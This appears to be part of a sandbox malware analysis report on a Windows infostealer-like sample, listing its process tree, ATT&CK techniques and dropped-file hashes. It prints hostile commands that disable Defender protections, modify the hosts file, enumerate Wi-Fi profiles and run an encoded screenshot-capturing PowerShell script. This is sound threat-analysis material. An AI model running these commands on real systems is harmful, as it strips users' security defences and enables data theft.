- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1468
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:2368
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:1044
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:668
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:712
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Network Configuration Discovery: Wi-Fi Discovery
  PID:424
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2568
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\04hepue3\04hepue3.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5288
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES48FB.tmp" "c:\Users\Admin\AppData\Local\Temp\04hepue3\CSC2B0DA4D6A9F495C8A1727C333178611.TMP"
      4⤵
      PID:5084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bee45fca2fca9ce87dab85b430bbdce7

SHA1
8a22d27da8d0e2afd73b85899b525f95b4928cdb

SHA256
58bef6ef3136ccc571117828e2f535422527f342fd8676c0afa0460869e9fbc1

SHA512
754e42a7697ecb7cb897fe7804b88e799c8ab249009f71d6fae475145defccb0d23dfcee118e847b794eeac9ad5ea952e1c8f336390a2ff28964e6f764d936ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\04hepue3\04hepue3.dll

Filesize
4KB

MD5
8b59fbcbdc28dda914b9d59381c654cc

SHA1
90c30c2bcd99b9d06d5716b5aae8e99ec98ab99e

SHA256
7a3ef19badbc71d2b4eadd309031f866e59629a995f9d9f8f36d003f3e295c78

SHA512
d7f1a8426dfd213e3a970e549efe969ed3ce92d34d3800c7c9a8f0c41d5a4da22c5b2f1ebe3c8d5ec239cbdca0717c5aee28deeba15d9f33e33d1f851e1efff9

Download Submit
C:\Users\Admin\AppData\Local\Temp\52ED3QlhgY\Display (1).png

Filesize
410KB

MD5
ed16a3c2fa7622c51f865cd95082d61b

SHA1
ba7f9589e7566ee4c2d74b5af9e27404491902f8

SHA256
eb895370cece2f1713f5806b68f33299b9117e6a16d473e8a10f4e664ffab3c9

SHA512
041aebc36b30b38852e0e571392079861f5a087a330f59805505273a2a1e9278027a802271e1c49a84f514cfe5b15f05201d8a25129895e5e6dd820cccb9021b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES48FB.tmp

Filesize
1KB

MD5
34451180f9043ae1ed3157e3e5ed2cab

SHA1
14394fe95d6812480515d26f25ceab7fdf4c38d5

SHA256
d1ba4f5e9abb97c3448955d7a354d8989260deac1749e5133406119460091cd7

SHA512
4b01af6c5999f28ebf8163e4fe5da3f7a63b33931dac9db5b617ebaf79c9f680a5df249e303aa65dfc977793d6383218f3d17b387cea55c2eb53db8c52100ce9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_arezv0ow.dar.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Filesize
9.5MB

MD5
24b21ce0ed7f316e6c01fd3d0ee6b5ce

SHA1
d79b1cb928fb1474b17bb0c47f86984bbffcc48e

SHA256
4a755f2a58e81e25763f504e5bea95a94ee6205aa79798aff61ccf60aa98382f

SHA512
4612c3cfe97457104f8e88502ebc1c3b4874a4c8569d52993748da4f9f48e8a07ca11dcc2921992d7e7ba09147255f6981ed4ff7dbf9aee6eb5e58ba81547b8c

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\04hepue3\04hepue3.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\04hepue3\04hepue3.cmdline

Filesize
607B

MD5
102fd4db22422c7be93d46d0b818c53a

SHA1
9ae285daa8804d0b00bfff49e6053f94b379a1d5

SHA256
25aa9e84b17c35d55f5eb5774fc9686b615e0dd8f597ecbe01e3fd6c21e19914

SHA512
4b9f45e1622a5c9a80e4958dc90b0fb0656a6093f55a390ccea611f4fd84220c7aa5503de23ecc8bdc788d5c0831bdd4dea45db1f61f9b084a23edab66c68e62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\04hepue3\CSC2B0DA4D6A9F495C8A1727C333178611.TMP

Filesize
652B

MD5
5ac3454d8b0f3ded4dae104b5f4bd1f4

SHA1
c0ca4cc69c31f22d0d4a60c708179a3bc6f1caa8

SHA256
defdcf3fbd725af4b58b11d5fabea8d5fc78138ef09f78c72d5c1f89212a00cc

SHA512
fa5135ba7e1517e2320fd2c99e374db97d3f06329eb6cae8dec8801243867648b9e94f343520c8376c89f6469e93f968758cff1307a5d404dabad5b829dd8d66

Download Submit
memory/2568-60-0x00000245B0910000-0x00000245B0918000-memory.dmp

Filesize
32KB

Download
memory/2936-5-0x000001D9BA430000-0x000001D9BA452000-memory.dmp

Filesize
136KB

Download